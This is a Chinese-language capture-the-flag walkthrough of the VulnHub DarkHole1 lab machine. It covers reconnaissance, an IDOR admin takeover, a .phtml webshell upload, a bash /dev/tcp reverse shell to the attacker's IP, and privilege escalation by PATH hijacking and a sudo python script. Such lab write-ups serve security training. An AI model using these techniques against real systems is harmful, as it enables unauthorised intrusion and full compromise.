VulnHub_DarkHole1靶机渗透流程

注意:部署时,靶机的网络连接模式必须和kali一致,让靶机跟kali处于同一网段,这用kali才能扫出靶机的主机

1. 信息收集1.1 探测IP

使用nmap扫描同一个段下存活的IP

nmap 192.168.157.0/24

发现192.168.157.138开放了80端口,访问后确认为此次渗透的靶机

1.2 详细信息扫描

nmap -A -p- 192.168.157.138

-A:启用操作系统探测与版本检测、脚本扫描和敏感性信息探测等

-p-:扫描所有端口,从0到65535

显示开放了22、80端口,开启了ssh、http服务

1.3 敏感目录扫描

dirsearch -u 192.168.157.138 -e *

-e *:递归枚举目录,使用*匹配所有目录

1.4 指纹收集

whatweb是一款网页指纹识别工具,可以从网页内容与源代码中提取特征,判断网页后端技术。

whatweb -v 192.168.157.138

-v 参数表示启用冗余模式,可以获取更详细的识别信息

2. 渗透流程2.1 注册账户登录

这里注意到我登录新注册的用户时 id=2,那么访问一下 id=1

“不允许访问其他用户信息” 确实存在,应该是管理员用户

2.2 越权登录admin

有修改密码的位置,抓一下修改密码的包

id 处可以产生越权,改成 id=1 后发包,即可用密码1111登录admin用户

2.3 文件上传获取shell

多出了一个文件上传区域,传个一句话木马

限制了文件上传类型只能为 jpg、png、gif

那么先抓包改包,尝试后缀名为 phtml 时成功上传并执行

连接蚁剑

2.4 反弹shell

在john目录下发现可执行文件 toto

利用蚁剑写一个shell脚本进行连接

bash -c 'bash -i >& /dev/tcp/192.168.157.131/9999 0>&1'

利用bash,反弹一个shell给kali

连接成功

2.5 提权获取john用户shell

查看toto文件

发现uid为john,可以利用环境变量来切换得到john用户shell。在/tmp目录下

echo "/bin/bash" > /tmp/idchmod +x /tmp/idexport PATH=/tmp:$PATH./toto

GPT的解释:

这段代码做了以下几件事:

  1. echo “/bin/bash” > /tmp/id : 在/tmp目录下创建一个文件id,内容是/bin/bash
  2. chmod +x /tmp/id : 给id文件添加执行权限
  3. export PATH=/tmp:$PATH : 将/tmp目录添加到PATH环境变量中

所以总的效果是在/tmp下创建了一个名为id的bash执行文件,并将其添加到了PATH路径中。

这 Bring 了一定安全隐患,因为现在直接输入id命令,会执行/tmp下的id文件,也就相当于执行了一个bash shell。

这种通过修改PATH实现攻击的技术,我们称之为PATH变量攻击。攻击者通过控制某个目录或文件的名称,并修改PATH环境变量,使得该目录下的某文件在执行某些命令时被执行,达到攻击目的。

拿到john用户下的flag:DarkHole{You_Can_DO_It}

3. 获取root权限

查看john用户的password :root123

ssh连接,登录john

搜一下具有sudo权限的命令

用户可以编辑并执行root权限的python脚本

那我们将获取shell的命令加入到python脚本中再去执行就可以获得root权限

echo 'import os;os.system("/bin/bash")' > file.pysudo python3 /home/john/file.py

得到root用户的flag:DarkHole{You_Are_Legend}